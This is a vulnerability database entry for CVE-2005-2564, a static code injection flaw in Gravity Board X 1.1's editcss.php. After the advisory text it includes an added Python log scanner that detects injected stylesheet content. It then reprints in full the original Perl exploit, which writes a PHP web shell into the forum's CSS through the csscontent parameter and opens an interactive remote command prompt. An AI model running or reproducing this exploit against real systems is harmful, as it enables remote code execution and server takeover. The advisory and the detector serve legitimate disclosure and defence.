Gravity Board X 'editcss.php' Static Code Injection Vulnerability

Vulnerability ID 1109772 Vulnerability type Unknown
Published 2006-02-17 Updated 2006-02-17
CVE ID CVE-2005-2564 CNNVD-ID CNNVD-200508-128
Platform PHP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1510
https://www.securityfocus.com/bid/89399
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-128
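|Vulnerability details
The editcss.php page in GravityBoardX (GBX) 1.1 contains a direct static code injection vulnerability. This allows remote attackers to directly execute arbitrary PHP code, HTML, or script via the csscontent parameter, which is inserted directly into the gbxfinal.css file.
|Exploit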
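
A defender-side check for the issue described above, as an added example that is not part of the original advisory or of Gravity Board X: it scans web server access log lines for editcss.php requests whose csscontent value carries code markers, and applies the same test to stylesheet text such as gbxfinal.css. The Apache-style log format, the marker list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers that have no place in a stylesheet: a PHP/short open tag,
# a closing </style> tag, or a <script> element (assumed marker list).
SUSPICIOUS = re.compile(r"<\?|</\s*style|<\s*script", re.IGNORECASE)
# Request line of an Apache common/combined log entry (assumed log format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, harmless payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /forum/editcss.php?csscontent=body%7Bcolor%3Ared%7D HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /forum/editcss.php?csscontent=%3C%2Fstyle%3E%3C%3Fphp%20echo%201%3B%20%3F%3E'
    ' HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /forum/index.php HTTP/1.1" 200 2048',
]


def css_is_tainted(css_text):
    """True if stylesheet text (e.g. the contents of gbxfinal.css) holds code markers."""
    return bool(SUSPICIOUS.search(css_text))


def flag_editcss_requests(log_lines):
    """Return (line_number, decoded csscontent) for suspicious editcss.php requests."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/editcss.php"):
            continue
        # parse_qs percent-decodes values, so encoded markers are seen too.
        for value in parse_qs(url.query).get("csscontent", []):
            if css_is_tainted(value):
                hits.append((n, value))
    return hits


if __name__ == "__main__":
    for line_no, value in flag_editcss_requests(SAMPLE_LOG):
        print(f"line {line_no}: suspicious csscontent: {value!r}")
```

Access logs record only the query string, so a csscontent value sent in a request body is caught only by running `css_is_tainted` over the stylesheet file itself.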
#!/usr/bin/perl

## Gravity Board X v1.1 (possibly prior versions) remote code execution exploit
## (c)oded by 1dt.w0lf
## 14.08.2005
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use LWP::UserAgent;

if(@ARGV<1) { &usage; exit(0); }

$path = $ARGV[0];
header();
print "Creating shell... Please wait\n";

$gr = LWP::UserAgent->new() or die;
$res = $gr->get($path.'editcss.php?csscontent=</style><?php error_reporting(0); system($HTTP_POST_VARS[cmd]); ?>');
if($res->as_string =~ /unable to save changes/)
 {
 print "Forum unable to save changes in css template. Exploitation failed.\n";
 exit(0);
 }
print "DONE.\n";

while ()
 {
    print "Type command for execute or 'q' for exit\nGravity# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'q');
        last;
     }
    &run($cmd);
 }

sub run()
 {
 $cmd2  = 'echo 1 && echo _START_ && ';
 $cmd2 .= $cmd;
 $cmd2 .= ' && echo _END_';
 $gr = LWP::UserAgent->new() or die;
 $res = $gr->post($path.'index.php',{"cmd" => "$cmd2"});   
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 1) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
 print "Can't execute command\n" if !$runned;
 }

sub header()
{
 print "--* Gravity Board X v1.1 exploit by RST/GHC\n";
 print "--* keep it private, not for public\n";
}

sub usage()
 {
  header();
  print "usage : r57Gravity.pl [path_to_forum]\n";
  print "  e.g.: r57Gravity.pl http://127.0.0.1/forum/\n";
 }

# milw0rm.com [2006-02-17]
|Affected products
Gravity Board X Development Team Gravity Board X 1.1
|References

Source: XF
Name: gravityboardx-template-xss(21742)
Link: http://xforce.iss.net/xforce/xfdb/21742
Source: BUGTRAQ
Name: 20050807GravityBoardXv1.1multiplevulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112351740803443&w=2